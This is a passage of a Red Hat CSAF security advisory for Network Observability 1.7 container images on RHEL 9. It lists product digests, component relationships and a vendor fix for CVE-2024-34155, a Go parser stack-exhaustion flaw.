"network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", product_identification_helper: { purl: "pkg:oci/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b?arch=s390x&repository_url=registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9&tag=v1.7.0-67", }, }, }, { category: "product_version", name: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", product: { name: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", product_id: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", product_identification_helper: { purl: "pkg:oci/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e?arch=s390x&repository_url=registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9&tag=v1.7.0-67", }, }, }, { category: "product_version", name: "network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", product: { name: "network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", product_id: "network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", product_identification_helper: { purl: "pkg:oci/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02?arch=s390x&repository_url=registry.redhat.io/network-observability/network-observability-operator-bundle&tag=1.7.0-86", }, }, }, { category: "product_version", name: "network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", product: { name: "network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", product_id: "network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", product_identification_helper: { purl: "pkg:oci/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134?arch=s390x&repository_url=registry.redhat.io/network-observability/network-observability-rhel9-operator&tag=v1.7.0-67", }, }, }, ], category: "architecture", name: "s390x", }, ], category: "vendor", name: "Red Hat", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", }, product_reference: "network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64 as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", }, product_reference: "network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", }, product_reference: "network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64 as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", }, product_reference: "network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64 as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", }, product_reference: "network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", }, product_reference: "network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", }, product_reference: "network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64 as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", }, product_reference: "network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64 as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", }, product_reference: "network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", }, product_reference: "network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", }, product_reference: "network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64 as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", }, product_reference: "network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64 as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", }, product_reference: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64 as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", }, product_reference: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", }, product_reference: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", }, product_reference: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64 as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", }, product_reference: "network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64 as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", }, product_reference: "network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", }, product_reference: "network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", }, product_reference: "network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64 as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", }, product_reference: "network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", }, product_reference: "network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64 as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", }, product_reference: "network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", }, product_reference: "network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, ], }, vulnerabilities: [ { cve: "CVE-2024-34155", cwe: { id: "CWE-674", name: "Uncontrolled Recursion", }, discovery_date: "2024-09-06T21:20:06.929766+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2310527", }, ], notes: [ { category: "description", text: "A flaw was found in the go/parser package of the Golang standard library. Calling any Parse functions on Go source code containing deeply nested literals can cause a panic due to stack exhaustion.", title: "Vulnerability description", }, { category: "summary", text: "go/parser: golang: Calling any of the Parse functions containing deeply nested literals can cause a panic/stack exhaustion", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-34155", }, { category: "external", summary: "RHBZ#2310527", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310527", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-34155", url: "https://www.cve.org/CVERecord?id=CVE-2024-34155", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-34155", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-34155", }, { category: "external", summary: "https://go.dev/cl/611238", url: "https://go.dev/cl/611238", }, { category: "external", summary: "https://go.dev/issue/69138", url: "https://go.dev/issue/69138", }, { category: "external", summary: "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk", url: "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk", }, { category: "external", summary: "https://pkg.go.dev/vuln/GO-2024-3105", url: "https://pkg.go.dev/vuln/GO-2024-3105", }, ], release_date: "2024-09-06T21:15:11.947000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-22T01:05:39+00:00", details: "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", 